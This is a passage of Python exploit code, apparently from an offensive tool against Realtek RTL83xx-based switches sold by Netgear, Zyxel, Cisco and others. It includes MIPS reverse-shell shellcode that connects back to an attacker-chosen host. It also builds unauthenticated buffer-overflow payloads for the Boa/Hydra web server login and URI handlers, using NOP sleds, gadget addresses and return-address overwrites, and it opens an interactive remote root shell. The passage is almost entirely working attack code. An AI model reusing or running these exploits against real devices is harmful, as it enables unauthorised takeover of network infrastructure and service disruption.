False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\r\n\t\t}\r\n\r\n\t\tif self.ETag == 'report':\r\n\r\n\t\t\tsorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value\r\n\t\t\tfor targets in sorted_dict:\r\n\t\t\t\tself.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])\r\n\t\t\t\tself.source = Vendor_ETag[targets]\r\n\t\t\t\tself.dict_merge(self.target,self.source)\r\n\t\t\t\tprint \"\"\r\n\r\n\t\t\t\ttmp = \"] {} {} v{} [\".format(self.target['vendor'],self.target['model'],self.target['version'])\r\n\t\t\t\tprint \"[{:=^78}]\".format(tmp)\r\n\r\n\t\t\t\tprint self.target['uri']\r\n\r\n\t\t\t\tprint \"\" # make it nicer to read\r\n\r\n\t\t\t\tLEN = len(self.target['exploit'])\r\n\t\t\t\tfor exploits in self.target['exploit']:\r\n\t\t\t\t\tif not self.target['exploit'][exploits]['vulnerable']:\r\n\t\t\t\t\t\tLEN = LEN - 1\r\n\r\n\t\t\t\ttmp = \"] {}({}) [\".format(\"Exploits \",LEN)\r\n\t\t\t\tprint \"[{:-^78}]\".format(tmp)\r\n\r\n\t\t\t\tfor exploits in self.target['exploit']:\r\n\t\t\t\t\ttmp = self.target['exploit'][exploits]\r\n\t\t\t\t\tif self.target['exploit'][exploits]['vulnerable']:\r\n\t\t\t\t\t\tlog.success(\"{:.<54}[Authenticated: {}]\\n{}\\n\".format(exploits, tmp['authenticated'] ,tmp['description']))\r\n\r\n\t\t\t\tprint \"\" # make it nicer to read\r\n\r\n\t\t\t\ttmp = \"] {}({}) [\".format(\"Verification \",len(self.target['verify']))\r\n\t\t\t\tprint \"[{:-^78}]\".format(tmp)\r\n\r\n\t\t\t\tfor verification in self.target['verify']:\r\n\t\t\t\t\ttmp = self.target['verify'][verification]\r\n\t\t\t\t\tlog.success(\"{:.<54}[Authenticated: {}]\\n{}\\n\".format(verification, tmp['authenticated'] ,tmp['description']))\r\n\r\n\r\n\t\t\t\tprint \"\"\r\n\t\t\treturn False\r\n\t\telif self.ETag == 'help':\r\n\t\t\tsorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value\r\n\t\t\tfor targets in sorted_dict:\r\n\t\t\t\tself.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])\r\n\t\t\t\tself.source = Vendor_ETag[targets]\r\n\t\t\t\tself.dict_merge(self.target,self.source)\r\n\t\t\t\tlog.info(\"ETag: {:<11} [{} {} v{}]\".format(targets, self.target['vendor'],self.target['model'],self.target['version']))\r\n\t\t\tprint \"\"\r\n\t\t\treturn False\r\n\r\n\r\n\t\tfor check in Vendor_ETag.keys():\r\n\t\t\tif check == self.ETag:\r\n\t\t\t\tself.target = copy.deepcopy(Vendor_Template[Vendor_ETag[check]['template']])\r\n\t\t\t\tself.source = Vendor_ETag[check]\r\n\r\n\t\t\t\tself.dict_merge(self.target,self.source)\r\n\t\t\t\treturn self.target\r\n\r\n\t\treturn False\r\n\r\n\r\nclass RTK_RTL83xx:\r\n\r\n\tdef __init__(self, rhost, proto, verbose, creds, Raw, lhost, lport):\r\n\t\tself.rhost = rhost\r\n\t\tself.proto = proto\r\n\t\tself.verbose = verbose\r\n\t\tself.credentials = creds\r\n\t\tself.Raw = Raw\r\n\t\tself.lhost = lhost\r\n\t\tself.lport = lport\r\n\r\n\t\tself.event = threading.Event()\r\n\r\n\t\tself.headers = {\r\n\t\t\t'Host':rhost,\r\n\t\t\t'User-Agent':'Chrome'\r\n\t\t\t}\r\n\r\n\t#\r\n\t# Workaround for Planet Tech. and others as it will always be logged in at my LAB\r\n\t#\r\n\tdef Workaround_logout(self):\r\n\t\ttry:\r\n\t\t\tURI = '/cgi-bin/dispatcher.cgi?cmd=3'\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) \r\n\t\t\treturn True\r\n\t\texcept Exception as e:\r\n\t\t\treturn True\r\n\t\t\tpass\r\n\r\n\t#\r\n\t# Very rare I have seen garbage returned with JSON data\r\n\t# make sure to clean out potential garbage, so we can load JSON with json.loads()\r\n\t#\r\n\tdef clean_json(self, text):\r\n\t\tself.text = text\r\n\r\n\t\tstart = 0\r\n\t\tresult = ''\r\n\r\n\t\tfor check in range(0,len(self.text)):\r\n\t\t\tif self.text[check] == '{':\r\n\t\t\t\tresult += self.text[check]\r\n\t\t\t\tstart = start + 1\r\n\t\t\telif start:\r\n\t\t\t\tresult += self.text[check]\r\n\t\t\t\tif self.text[check] == '}':\r\n\t\t\t\t\tstart = start - 1\r\n\r\n\t\treturn result\r\n\r\n\t#\r\n\t# Small function to return N in random chars\r\n\t#\r\n\tdef random_string(self,length):\r\n\t\tself.length = length\r\n\r\n\t\treturn 'A' * self.length\r\n\t\t#return ''.join(random.choice(string.lowercase) for i in range(self.length))\r\n\r\n\tdef md5hash(self, string, base64encode):\r\n\t\tself.string = string\r\n\t\tself.base64encode = base64encode\r\n\r\n\t\thash_object = hashlib.md5(self.string)\r\n\t\tmd5_hash = hash_object.hexdigest()\r\n\r\n\t\tif self.base64encode:\r\n\t\t\treturn base64.b64encode(md5_hash)\t# Why...\r\n\t\telse:\r\n\t\t\treturn md5_hash\r\n\r\n\tdef caesar_encode(self, string):\r\n\t\tself.string = string\r\n\r\n\t\treturn ''.join(chr(32 + int(ord(self.string[char])) % 95) for char in range(0,len(self.string)))\r\n\r\n\tdef caesar_decode(self, string):\r\n\t\tself.string = string\r\n\r\n\t\treturn ''.join(chr(int(ord(self.string[char])) - 32 % 95) for char in range(0,len(self.string)))\r\n\r\n\t#\r\n\t# Obfuscation\r\n\t# \r\n\t# Functionality:\r\n\t# Reversed password string, split each character 7 bytes apart, split and put size of password at two fixed locations in the string,\r\n\t# then fill the rest with random garbage to look like advanced and unknown encryption\r\n\t#\r\n\t# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP\r\n\t# Zyxel: GS1900-24-2.40_AAHL.1_20180705\r\n\t#\r\n\tdef obfuscation_encode(self, password):\r\n\t\tself.password = password\r\n\r\n\t\ttext = ''\r\n\t\tpossible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'\r\n\r\n\t\t# Max 99 char in password\r\n\t\tself.password = self.password[:99]\r\n\r\n\t\tinlen = len(self.password)\r\n\t\tinlenn = len(self.password)\r\n\r\n\t\tif (len((self.password) * 7) + 7) <= 320:\r\n\t\t\tPASS_LEN = 321 # string needs to be 320 bytes as minimum\r\n\t\telse:\r\n\t\t\tPASS_LEN = (len((self.password) * 7) + 7)\r\n\r\n\t\tfor i in xrange(1, PASS_LEN ,1):\r\n\t\t\tif (0 == i % 7 and inlen > 0):\r\n\t\t\t\ttext += self.password[inlen-1]\r\n\t\t\t\tinlen = inlen - 1\r\n\t\t\telif (i == 123):\r\n\t\t\t\tif inlenn < 10:\r\n\t\t\t\t\ttext += '0'\r\n\t\t\t\telse:\r\n\t\t\t\t\ttext += str(int(math.floor(inlenn / 10)))\r\n\t\t\telif (i == 289):\r\n\t\t\t\ttext += str(inlenn % 10)\r\n\t\t\telse:\r\n\t\t\t\t#text += '_'\t# debug\r\n\t\t\t\ttext += possible[int(math.floor(randint(0, len(possible)-1)))] # random garbage\r\n\r\n\t\treturn text\r\n\r\n\t#\r\n\t# Obfuscation\r\n\t#\r\n\t# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP\r\n\t# Zyxel: GS1900-24-2.40_AAHL.1_20180705\r\n\t#\r\n\tdef obfuscation_decode(self, password):\r\n\t\tself.password = password\r\n\r\n\t\ttext = ''\r\n\t\tfor i in range(1, len(self.password) ):\r\n\t\t\tif (0 == i % 7):\r\n\t\t\t\tif len(text) == (int(self.password[122]) * 10) + int(self.password[288]):\r\n\t\t\t\t\tbreak\r\n\t\t\t\ttext += self.password[i-1]\r\n\t\ttext = text[::-1] # reverse string\r\n\t\treturn text\r\n\r\n\tdef netgear_hash(self, URI):\r\n\t\tself.URI = URI\r\n\r\n\t\treturn '&hash=' + self.md5hash(URI.split(\"?\")[1],False)\r\n\r\n\tdef _encrypt_RSA(self, modulus, passphrase, text):\r\n\t\tkey = RSA.construct((modulus, passphrase))\r\n\t\tcipher = PKCS1_v1_5.new(key)\r\n\t\tciphertext = cipher.encrypt(text)\r\n \r\n\t\treturn ciphertext\r\n \r\n\tdef RSA_encrypt_params(self, cisco_modulus, password):\r\n\t\tself.cisco_modulus = cisco_modulus\r\n\t\tself.password = password\r\n\r\n\t\tencrypted_passphrase = self._encrypt_RSA(string.atol(self.cisco_modulus, 16),\r\n\t\t\t\t\t\t\t\t\t\t\t\t string.atol(\"10001\", 16),\r\n\t\t\t\t\t\t\t\t\t\t\t\t self.password)\r\n\t\treturn base64.b64encode(encrypted_passphrase)\r\n\r\n\tdef RSA_Password(self, string):\r\n\t\tself.string = string\r\n\r\n\t\tURI = target['modulus_uri']\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)\r\n\t\tresult = json.loads(response.read())\r\n\r\n\t\tif result['data']['modulus']:\r\n\t\t\tcipher = self.RSA_encrypt_params(result['data']['modulus'], str(self.string))\r\n\t\telse:\r\n\t\t\treturn self.string\r\n\r\n\t\treturn urllib.quote_plus(cipher)\r\n\r\n\tdef check_XSID(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif self.target['xsid']:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\tdef Cisco_XSID(self,target):\r\n\t\tself.target = target\r\n\r\n\t\tURI = target['xsid_uri']\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)\r\n\t\tresult = json.loads(response.read())\r\n\r\n\t\tif result['data']['modulus']:\r\n\t\t\tcipher = self.RSA_encrypt_params(result['data']['modulus'],str(result['data']['xsid']))\r\n\t\t\treturn cipher\r\n\t\telse:\r\n\t\t\treturn result['data']['xsid']\r\n\r\n\tdef shellcode(self):\r\n\r\n\t\t#\r\n\t\t# Reverse shell\r\n\t\t#\r\n\t\t# SRC: https://www.exploit-db.com/exploits/45541\r\n\t\t#\r\n\t\tMIPSeb = string.join([\r\n\t\t\t\"\\x24\\x0f\\xff\\xfa\"\t# li\t$t7, -6\r\n\t\t\t\"\\x01\\xe0\\x78\\x27\"\t# nor $t7, $zero\r\n\t\t\t\"\\x21\\xe4\\xff\\xfd\"\t# addi $a0, $t7, -3\r\n\t\t\t\"\\x21\\xe5\\xff\\xfd\"\t# addi $a1, $t7, -3\r\n\t\t\t\"\\x28\\x06\\xff\\xff\"\t# slti $a2, $zero, -1\r\n\t\t\t\"\\x24\\x02\\x10\\x57\"\t# li\t$v0, 4183 ( sys_socket )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\xaf\\xa2\\xff\\xff\"\t# sw\t$v0, -1($sp)\r\n\t\t\t\"\\x8f\\xa4\\xff\\xff\"\t# lw\t$a0, -1($sp)\r\n\t\t\t\"\\x34\\x0f\\xff\\xfd\"\t# li\t$t7, -3 ( sa_family = AF_INET )\r\n\t\t\t\"\\x01\\xe0\\x78\\x27\"\t# nor $t7, $zero\r\n\t\t\t\"\\xaf\\xaf\\xff\\xe0\"\t# sw\t$t7, -0x20($sp)\r\n\t\t\t# ================ You can change port here =================\r\n\t\t\t\"\\x3c\\x0ePP0PP1\"\t# lui $t6, 0x115c ( sin_port = 0x115c ) # 4444\r\n\t\t\t# ============================================================\r\n\t\t\t\"\\x35\\xce\\x7a\\x69\"\t# ori $t6, $t6, 0x7a69 \r\n\t\t\t\"\\xaf\\xae\\xff\\xe4\"\t# sw\t$t6, -0x1c($sp)\r\n\t\t\t# ================ You can change ip here =================\r\n\t\t\t\"\\x3c\\x0eIP1IP2\"\t# lui $t6, 0xc0a8\t ( sin_addr = 0xc0a8 ... # 192 168\r\n\t\t\t\"\\x35\\xceIP3IP4\"\t# ori $t6, $t6, 0x029d ... 0x3901 # 57 1\r\n\t\t\t# ============================================================\r\n\t\t\t\"\\xaf\\xae\\xff\\xe6\"\t# sw\t$t6, -0x1a($sp)\r\n\t\t\t\"\\x27\\xa5\\xff\\xe2\"\t# addiu $a1, $sp, -0x1e\r\n\t\t\t\"\\x24\\x0c\\xff\\xef\"\t# li\t$t4, -17 ( addrlen = 16 )\r\n\t\t\t\"\\x01\\x80\\x30\\x27\"\t# nor $a2, $t4, $zero\r\n\t\t\t\"\\x24\\x02\\x10\\x4a\"\t# li\t$v0, 4170 ( sys_connect )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x24\\x0f\\xff\\xfd\"\t# li\tt7,-3\r\n\t\t\t\"\\x01\\xe0\\x28\\x27\"\t# nor a1,t7,zero\r\n\t\t\t\"\\x8f\\xa4\\xff\\xff\"\t# lw\t$a0, -1($sp) \r\n\t\t\t# dup2_loop:\r\n\t\t\t\"\\x24\\x02\\x0f\\xdf\"\t# li\t$v0, 4063 ( sys_dup2 )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x24\\xa5\\xff\\xff\"\t# addi a1,a1,-1 (\\x20\\xa5\\xff\\xff)\r\n\t\t\t\"\\x24\\x01\\xff\\xff\"\t# li\tat,-1\r\n\t\t\t\"\\x14\\xa1\\xff\\xfb\"\t# bne a1,at, dup2_loop\r\n\t\t\t\"\\x28\\x06\\xff\\xff\"\t# slti $a2, $zero, -1\r\n\t\t\t\"\\x3c\\x0f\\x2f\\x2f\"\t# lui $t7, 0x2f2f (//)\r\n\t\t\t\"\\x35\\xef\\x62\\x69\"\t# ori $t7, $t7, 0x6269 (bi)\r\n\t\t\t\"\\xaf\\xaf\\xff\\xec\"\t# sw\t$t7, -0x14($sp)\r\n\t\t\t\"\\x3c\\x0e\\x6e\\x2f\"\t# lui $t6, 0x6e2f (n/)\r\n\t\t\t\"\\x35\\xce\\x73\\x68\"\t# ori $t6, $t6, 0x7368 (sh) \r\n\t\t\t\"\\xaf\\xae\\xff\\xf0\"\t# sw\t$t6, -0x10($sp)\r\n\t\t\t\"\\xaf\\xa0\\xff\\xf4\"\t# sw\t$zero, -0xc($sp)\r\n\t\t\t\"\\x27\\xa4\\xff\\xec\"\t# addiu $a0, $sp, -0x14\r\n\t\t\t\"\\xaf\\xa4\\xff\\xf8\"\t# sw\t$a0, -8($sp)\r\n\t\t\t\"\\xaf\\xa0\\xff\\xfc\"\t# sw\t$zero, -4($sp)\r\n\t\t\t\"\\x27\\xa5\\xff\\xf8\"\t# addiu $a1, $sp, -8\r\n\t\t\t\"\\x24\\x02\\x0f\\xab\"\t# li\t$v0, 4011 (sys_execve)\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x8f\\x84\\x80\\x18\"\t# Variant of NOP\r\n\t\t\t], '')\t\r\n\r\n\r\n\t\t# Connect back IP\r\n\t\tip_hex = '{:02x} {:02x} {:02x} {:02x}'.format(*map(int, self.lhost.split('.')))\r\n\t\tip_hex = ip_hex.split()\r\n\t\tIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n\r\n\t\t# Let's break apart the hex code of LPORT into two bytes\r\n\t\tport_hex = hex(int(self.lport))[2:]\r\n\t\tport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n\t\tport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n\t\tport_hex = port_hex.split()\r\n\t\tif len(port_hex) == 1:\r\n\t\t\tport_hex = ('00' + ' ' + ''.join(port_hex)).split()\r\n\r\n\t\t#\r\n\t\t# Replace IP and PORT in shellcode\r\n\t\t#\r\n\t\tMIPSeb = MIPSeb.replace('PP0',chr(int(port_hex[0],16)))\r\n\t\tMIPSeb = MIPSeb.replace('PP1',chr(int(port_hex[1],16)))\r\n\r\n\t\tMIPSeb = MIPSeb.replace('IP1',chr(int(IP1,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP2',chr(int(IP2,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP3',chr(int(IP3,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP4',chr(int(IP4,16)))\r\n\r\n\t\treturn MIPSeb\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\t# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected\r\n\t#\r\n\t# Note:\r\n\t# The vulnerability are _not_ from Boa nor Hydra, coming from Realtek coding.\r\n\t# The device should be newly restarted and/or not been accessed with http/https, so the heap is relative untouched.\r\n\t#\r\n\t# This code will:\r\n\t# 1. Trigger stack overflow in boa/Hydra web server [ extractVmlinuxImage(), getFdStr() ]\r\n\t# 2. Overwrite first byte in provided RA with 0x00, so we can jump within the binary\r\n\t# 3. Jump to our gadget\r\n\t# 4. Jump to NOP sled and shellcode on heap\r\n\t# 5. Launch forked() reverse shell\r\n\t# 6. Try restart Boa/Hydra (to mitigate DoS)\r\n\t#\r\n\t# Success: Reverse shell and restarted Boa/Hydra\r\n\t# Failure: No reverse shell and crashed Boa/Hydra (DoS)\r\n\t#\r\n\tdef heack_hydra_shell(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['heack_hydra_shell']['vulnerable']:\r\n\t\t\tlog.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\t# Connect-timeout in seconds\r\n\t\ttimeout = 20\r\n\t\tsocket.setdefaulttimeout(timeout)\r\n\r\n\t\tthread.start_new_thread(self.heack_hydra_exploit,(\"heack_hydra_exploit\",self.target,))\r\n\r\n\t\tlsock = listen(port=self.lport)\r\n\t\tc = lsock.wait_for_connection()\r\n\t\tif not self.event.is_set():\r\n\t\t\tc.interactive(prompt = '# ')\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.failure(\"Got internal connection to quit\")\r\n\t\t\tc.close()\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef heack_hydra_exploit(self, threadName, target):\r\n\t\tself.threadName = threadName\r\n\t\tself.target = target\r\n\t\tCRLF_NOP = 0x24060d0a # NOP w/ CRLF (li $a2, 0x00000D0A)\r\n\t\tNOP = 0x2406ffff\t# NOP (li $a2, 0xFFFFFFFF)\r\n\t\tJUMP = 0x04110111 # bal +273\r\n\r\n\t\t# Debug\r\n\t\t#CRLF_NOP = 0x4c460d0a # LF\\r\\n\r\n\t\t#NOP = 0x6e6f6f70 # noop\r\n\t\t#JUMP = 0x4a4d5044 # JMPD\r\n\t\t#MIPSeb = (\"\\x43\\x4f\\x44\\x45\" * 45) + \"\\x4e\\x4f\\x4f\\x50\" # CODE + NOOP = 148 bytes\r\n\r\n\t\tquery_args = ''\r\n\r\n\t\t#\r\n\t\t# This will overwrite RA:\r\n\t\t#\r\n\t\t\r\n\t\t#\r\n\t\t# NETGEAR: 'getFdStr()' modified, this is weird 'solution' to have $t9 loaded with JMP in 'fwrite()'\r\n\t\t#\r\n\t\tif self.target.get('hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)\r\n\t\t\tquery_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'])) * 76 # direct heap address\r\n\t\telse:\r\n\t\t\tquery_args += (struct.pack('>L',NOP) * 73) + struct.pack('>L',JUMP) + struct.pack('>L',NOP) # 300 bytes + RA below\r\n\r\n\t\t#\r\n\t\t# Return address to where we want jump (0x58 will be overwritten with 0x00 below)\r\n\t\tquery_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'] + 0x58000000)) # 0x58xxxxxx\r\n\r\n\t\t#\r\n\t\t# Space between new RA and overwrite with 0x00 (Range: 1 => 3)\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * 2\r\n\r\n\t\t# CRLF_NOP will overwrite '0x58' in above RA address with 0x00, as the code will always terminate CRLF with 0x00\r\n\t\t#\r\n\t\t# 7FF4BE60 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 noopnoopnoopnoop\r\n\t\t# 7FF4BE70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 noopnoopnoopnoop\r\n\t\t# 7FF4BE80 6E 6F 6F 70 6E 6F 6F 70 4C 46 0D 0A 00 40 FF AC [email\u00a0protected] <=== 'X' overwritten with 0x00\r\n\t\t#\r\n\t\tquery_args += (struct.pack('>L',NOP) * 74) + struct.pack('>L',CRLF_NOP) # 300 bytes + 0x00\r\n\r\n\t\t#\r\n\t\t# $v0 = tmpHeaderSize\r\n\t\t# $gp = pointing to heap\r\n\t\t#\r\n\t\t# Gadget:\r\n\t\t# addu $v0,\t$g0 # The addition of $v0 and $g0 points to our heap NOP sled\r\n\t\t# jr\t$v0 \t# Its lovely when [heap] are rwxp :>\r\n\t\t#\r\n\t\t# This adjusting $v0 value (Range: 4 => 9)\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * self.target['exploit']['heack_hydra_shell']['v0']\r\n\r\n\t\t#\r\n\t\t# fork() reverse shell to get new PID, and jump over child\r\n\t\t#\r\n\t\tquery_args += struct.pack('>L',0x24020fa2) # li $v0, 4002 ( fork )\r\n\t\tquery_args += struct.pack('>L',0x0101010c) # syscall unk_40404\r\n\t\tquery_args += struct.pack('>L',0x1c400101) # bgtz $v0, +257 ( Jump over child to restart boa/Hydra )\r\n\r\n\t\t#\r\n\t\t# Child\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 60) + struct.pack('>L',CRLF_NOP))\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))\r\n\t\t#\r\n\t\t# Shellcode\r\n\t\t#\r\n\t\tquery_args += self.shellcode()\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 17) + struct.pack('>L',CRLF_NOP))\r\n\r\n\t\t#\r\n\t\t# Parent\r\n\t\t#\r\n\t\tquery_args += (struct.pack('>L',NOP) * 59)\r\n\t\t#\r\n\t\t# Restart Boa/Hydra to mitigate DoS\r\n\t\t# (From boa/Hydra binary == binary dependent)\r\n\t\t#\r\n\t\tquery_args += struct.pack('>L',0x8f848018) # opcode [la $a0, 0x430000]\r\n\t\tquery_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['system']) # opcode, binary dependent [la $t9, system]\r\n\t\tquery_args += struct.pack('>L',0x0320f809) # opcode [jalr $t9 ; system]\r\n\t\tquery_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['handler']) # opcode, binary dependent [addiu $a0, (.ascii \"handler -c boa &\" - 0x430000)]\r\n\t\tquery_args += struct.pack('>L',CRLF_NOP)\r\n\t\t#\r\n\t\t# Parent Boa/Hydra will get SIGSEGV here, but we do not care as its restarted\r\n\t\t#\r\n\r\n\t\tURI = self.target['exploit']['heack_hydra_shell']['uri'] + (struct.pack('>L',NOP) * 247) + struct.pack('>L',JUMP) + struct.pack('>L',NOP)\r\n\r\n\r\n\t\tif self.target.get('hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)\r\n\t\t\tURI = self.target['exploit']['heack_hydra_shell']['uri']\r\n\t\t\tURI += '&&' # align\r\n\t\t\tURI += self.netgear_hash(URI)\r\n\t\t#\r\n\t\t# Everything here is designed to have opcodes properly aligned in memory\r\n\t\t#\r\n\t\tMESSAGE = 'POST '+ URI + ' HTTP/1.1\\r\\n'\t# Important with 3x 0x20 between POST and URI to align opcodes at heap\r\n\t\tMESSAGE += 'Content-Length: 3133337\\r\\n'\t# Trick Boa/Hydra to think we will send more than 1MiB\r\n\t\tMESSAGE += 'Host:PWN' + '\\r\\n\\r\\n'\t\t\t# 'PWN' = Align opcodes in memory\r\n\t\tDEBUG(\"SEND\",MESSAGE)\r\n\t\tMESSAGE += query_args\r\n\r\n\r\n\t\tlog.success(\"Payload: {} bytes, $v0: {}\".format(len(query_args),hex(len(query_args)) ))\r\n\r\n\t\tself.rport = int(self.rhost.split(\":\")[1])\r\n\t\tself.rhost = self.rhost.split(\":\")[0]\r\n\r\n\t\ttry:\r\n\t\t\tr = remote(self.rhost,self.rport,ssl=False) # HTTP Working, about 0x105c in $v0\r\n\t\t\t#r = remote(self.rhost,self.rport,ssl=True) # HTTPS Not working, need minimium 0x4350 in $v0\r\n\t\texcept Exception as e:\r\n\t\t\t# Dirty but works\r\n\t\t\tself.event.set()\r\n\t\t\tremote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\treturn False\r\n\t\ttry:\r\n\t\t\tr.send(MESSAGE)\r\n\t\t\tr.close()\r\n\t\texcept Exception as e:\r\n\t\t\t# Dirty but works\r\n\t\t\tself.event.set()\r\n\t\t\tremote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: N/A\r\n\t# Exploitable: N/A\r\n\t#\r\n\t# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected\r\n\t#\r\n\tdef heack_shell(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['vulnerable']:\r\n\t\t\tlog.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tthread.start_new_thread(self.heack_exploit,(\"heack_exploit\",self.target))\r\n\r\n\t\tl = listen(port=lport)\r\n\t\tc = l.wait_for_connection()\r\n\t\tif not self.event.is_set():\r\n\t\t\tself.event.set() # Success, got the connection, stop trying to exploit\r\n\t\t\tc.interactive(prompt = '# ')\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.failure(\"Got internal connection to quit\")\r\n\t\t\tc.close()\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\t# This will load shellcode on remote, used for both stack and heap.\r\n\t# stack: walk down in stack and hit the NOP sled to execute shellcode\r\n\t# heap: walk up on heap and hit the NOP sled to execute shellcode\r\n\t#\r\n\tdef heack_exploit(self, threadName, target):\r\n\t\tself.threadName = threadName\r\n\t\tself.target = target\r\n\r\n\t\ttime.sleep(2) # So this will be consistent after output from 'reverse_shell'\r\n\t\tshell = log.progress('shellcode')\r\n\r\n\t\tself.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']\r\n\r\n\t\tNOP = 0x2406ffff\t# NOP (li $a2, 0xFFFFFFFF)\r\n\r\n\t\tSTART = self.target['exploit']['heack_cgi_shell']['START']\r\n\r\n\t\tif self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tEXPR = (START > self.target['exploit']['heack_cgi_shell']['STOP']) # down on stack\r\n\t\telse:\r\n\t\t\tEXPR = (START < self.target['exploit']['heack_cgi_shell']['STOP']) # up on heap\r\n\r\n\t\twhile EXPR:\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\t\tshell.status(\"{} searching\".format(hex(START)))\r\n\t\t\t#\r\n\t\t\t#\r\n\t\t\tquery_args = self.target['exploit']['heack_cgi_shell']['query']\r\n\t\t\tquery_args = query_args.replace(\"_ALIGN\",self.random_string(self.target['exploit']['heack_cgi_shell']['align']))\r\n\t\t\tquery_args = query_args.replace(\"_USRNOP\",struct.pack('>L',NOP) * self.target['exploit']['heack_cgi_shell']['usr_nop'])\r\n\t\t\tquery_args = query_args.replace(\"_SHELLCODE\",self.shellcode())\r\n\t\t\tquery_args = query_args.replace(\"_PWDNOP\",struct.pack('>L',NOP) * self.target['exploit']['heack_cgi_shell']['pwd_nop']) # Filler only\r\n\r\n\t\t\tif self.target['login']['encryption'] == 'caesar':\r\n\t\t\t\tquery_args = query_args.replace(\"_RA_START\",struct.pack('>L',START + 0xc1c1c1c1)) # caesar bug? =]\r\n\t\t\telse:\r\n\t\t\t\tquery_args = query_args.replace(\"_RA_START\",struct.pack('>L',START))\r\n\r\n\t\t\ttry:\r\n\t\t\t\tURI = self.target['exploit']['heack_cgi_shell']['login_uri']\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\r\n\t\t\t\t#DEBUG(\"RECV\",response.read())\r\n\t\t\t\t#self.event.set()\r\n\t\t\t\t#r = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\t\t#r.close()\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tif e.code == 